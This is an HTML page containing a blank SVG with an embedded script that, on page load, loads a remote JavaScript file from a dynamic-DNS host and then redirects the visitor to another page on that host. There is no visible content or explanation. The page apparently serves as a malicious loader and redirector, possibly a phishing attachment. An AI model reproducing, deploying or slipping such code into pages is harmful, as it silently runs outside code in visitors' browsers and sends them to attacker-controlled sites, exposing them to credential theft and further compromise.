<head>
</head>
<html>
<body>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 10000 5625" id="mysvg" preserveAspectRatio="none" width="100%" style="background-color:#fff" >
     <script type="text/javascript">
        var svg = document.getElementById('mysvg');
        window.onload = function () {
           var script = document.createElement("script");
           script.type = "text/javascript";
           script.async = false;
           script.src = "http://timsherri.mooo.com/js/connect.js";
           document.getElementById('mysvg').appendChild(script);
           location.replace("http://timsherri.mooo.com/cld/connect6.html");
        };
     </script>
</svg>
</body>
</html>
